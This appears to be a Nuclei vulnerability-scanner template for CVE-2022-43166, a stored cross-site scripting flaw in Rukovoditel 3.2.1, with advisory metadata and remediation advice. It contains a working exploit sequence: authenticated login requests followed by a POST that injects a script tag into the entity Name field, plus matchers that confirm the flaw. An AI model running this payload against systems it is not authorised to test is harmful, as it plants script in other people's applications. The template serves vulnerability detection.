id: CVE-2022-43166 info: name: Rukovoditel <= 3.2.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: - https://github.com/anhdq201/rukovoditel/issues/2 - http://rukovoditel.com/ - https://nvd.nist.gov/vuln/detail/CVE-2022-43166 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 epss-score: 0.00197 epss-percentile: 0.56575 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - | POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es= redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and extractors: - type: regex name: nonce group: 1 regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true # digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950